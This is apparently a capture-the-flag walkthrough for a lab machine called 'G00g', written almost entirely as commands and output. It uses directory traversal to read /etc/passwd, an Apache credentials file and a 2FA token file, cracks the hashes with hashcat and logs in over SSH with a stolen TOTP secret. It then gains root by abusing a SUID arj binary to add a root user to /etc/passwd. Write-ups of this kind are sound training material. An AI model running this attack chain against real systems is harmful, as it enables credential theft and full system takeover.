# G00g

### Enumeration

```
http://192.168.145.144

Basic login:
admin:admin

In page source:
<!-- itemir/apache_2fa -->
```

<https://github.com/itemir/apache\\_2fa>

```
POST /checkpost.php HTTP/1.1
...
job=ps

The response:
HTTP/1.1 302 Found
Location: /index.php?workon=am9iPXBz

am9iPXBz -> Base64 decoded job=ps

View Result -> /spool/viewresult.php?view=192.168.49.145_1639874661.txt
```

Directory traversal -> view parameter

```
- /viewresult.php?view=/etc/passwd

fox:x:1000:1000::/home/fox:/bin/sh

- /viewresult.php?view=/etc/apache2/apache2.conf

- /viewresult.php?view=/etc/apache2/sites-enabled/000-default.conf

AuthUserFile /opt/apache_2fa/apache_credentials

- /viewresult.php?view=/opt/apache_2fa/apache_credentials

admin:$apr1$pa.RhgPO$18S/xeIW24UvBgjVJJXiC1
fox:$apr1$[REDACTED]
```

```
$ hashcat -m 1600 -w 4 -a 0 hash.txt ~/Desktop/rockyou.txt --force
admin:admin
fox:[REDACTED]

$ ssh fox@192.168.145.144
(fox@192.168.145.144) Verification code:?
```

<https://github.com/itemir/apache_2fa/blob/master/tokens.json>

```
/viewresult.php?view=/opt/apache_2fa/tokens.json

{
  "admin": "ND4LKCSFMUQISO6CBZQATLDP",
  "fox": "[REDACTED]"
}
```

Firefox plugin -> <https://addons.mozilla.org/en-US/firefox/addon/auth-helper/>

Add -> Manual Entry -> Use this secret:"\[REDACTED]" to generate code.

### Initial Access

```
$ ssh fox@192.168.145.144
(fox@192.168.145.144) Verification code:
```

### PrivEsc

```
$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/arj

$ cd /tmp
$ cp /etc/passwd passwd
$ echo "ch:\$1\$ignite\$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash" >> passwd
$ arj a priv passwd
$ arj x priv.arj /etc/
→ Yes

$su ch
Password: pass123
```